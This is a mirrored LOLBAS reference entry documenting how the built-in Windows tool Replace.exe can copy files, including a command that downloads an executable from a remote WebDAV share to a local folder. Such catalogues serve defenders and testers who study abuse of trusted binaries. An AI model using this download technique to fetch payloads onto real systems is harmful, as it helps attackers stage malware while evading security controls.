mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-27 23:37:58 +01:00
22 lines
531 B
Markdown
22 lines
531 B
Markdown
|
## Replace.exe
|
||
|
* Functions: Copy, Download
|
||
|
```
|
||
|
|
||
|
replace.exe C:\Source\File.cab C:\Destination /A
|
||
|
Copy the specified file to the destination folder.
|
||
|
|
||
|
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
|
||
|
Copy the specified file to the destination folder.
|
||
|
```
|
||
|
|
||
|
* Resources:
|
||
|
* https://twitter.com/elceef/status/986334113941655553
|
||
|
* https://twitter.com/elceef/status/986842299861782529
|
||
|
|
||
|
* Full path:
|
||
|
* C:\Windows\System32\replace.exe
|
||
|
* C:\Windows\SysWOW64\replace.exe
|
||
|
|
||
|
* Notes: Thanks to elceef - @elceef
|
||
|
|